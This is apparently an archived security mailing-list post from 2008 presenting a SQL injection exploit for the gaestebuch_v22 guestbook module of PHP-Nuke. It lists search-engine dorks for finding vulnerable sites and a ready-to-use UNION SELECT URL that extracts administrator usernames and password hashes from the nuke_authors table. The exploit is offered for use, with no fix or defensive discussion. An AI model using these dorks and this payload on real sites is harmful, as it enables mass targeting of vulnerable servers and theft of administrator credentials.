Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

h2desk helpdesk path disclosure vulnerability

Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection Vulnerability

Mambo com_Musica "id" Remote SQL Injection

netOffice Dwins 1.3 Remote code execution.

From:	turkish-warriorr_(at)_hotmail.com <turkish-warriorr_(at)_hotmail.com>
Date:	02.03.2008
Subject:	PHP-Nuke Copyright 2005 SQL

#########################################################################
#
#  PHP-Nuke Copyright © 2005 by Francisco Burzi
#
#########################################################################
#
#  AUTHOR : TurkishWarriorr
#
#  SiTE : http://1923turk.org
#
#  MAİL : turkish-warriorr@hotmail.com
#
#########################################################################
#
# DORK  : allinurl:"PHP-Nuke Copyright © 2005 by Francisco Burzi"
#
# DORK  : allinurl:"gaestebuch_v22&func"
#
#
##########################################################################
EXPLOIT :

-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1

modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,
aid,pwd+from+nuke_authors+where+radminsuper=1

#########################################################################